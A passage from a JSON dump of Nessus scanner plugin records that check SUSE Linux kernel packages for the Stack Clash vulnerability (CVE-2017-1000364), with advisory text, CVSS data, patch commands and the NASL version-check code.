https://www.suse.com/support/update/announcement/2017/suse-su-20171912-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a06ca9ec\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1188=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1188=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_77-default-2-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_77-xen-2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:20", "description": "This update for the Linux Kernel 3.12.69-60_64_32 fixes several issues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1941-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_32-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_32-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1941-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101943", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1941-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101943);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1941-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.69-60_64_32 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171941-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?93dce757\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1208=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1208=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_32-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_69-60_64_32-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_69-60_64_32-default-4-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_69-60_64_32-xen-4-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:00", "description": "This update for the Linux Kernel 3.12.74-60_64_45 fixes several issues. The following bugs were fixed :\n\n - CVE-2017-1000364: The previous fix for the stack gap increase tracked by CVE-2017-1000364 had a regression, which is fixed by this follow up patch. (bsc#1039496)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-21T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1915-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_45-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_45-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1915-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1915-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101890);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1915-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.74-60_64_45 fixes several\nissues. The following bugs were fixed :\n\n - CVE-2017-1000364: The previous fix for the stack gap\n increase tracked by CVE-2017-1000364 had a regression,\n which is fixed by this follow up patch. (bsc#1039496)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171915-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1302b3c8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1187=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1187=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_45-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_45-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_45-default-2-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_45-xen-2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:01", "description": "This update for the Linux Kernel 3.12.60-52_63 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-24T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1922-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_63-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_63-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1922-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101926", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1922-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101926);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1922-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.60-52_63 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1017589\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171922-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?db8d312e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1194=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1194=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_63-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_63-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_63-default-6-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_63-xen-6-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:32", "description": "This Linux kernel update for SUSE Linux Enterprise 11 SP4 fixes the following issues :\n\n - A previous security update to address CVE-2017-1000364 caused unintended side-effects in several other tools, most notably Java. These issues have been remedied.\n [bsc#1045340, bsc#1045406]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-27T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : kernel-source (SUSE-SU-2017:1696-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-trace", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2017-1696-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory 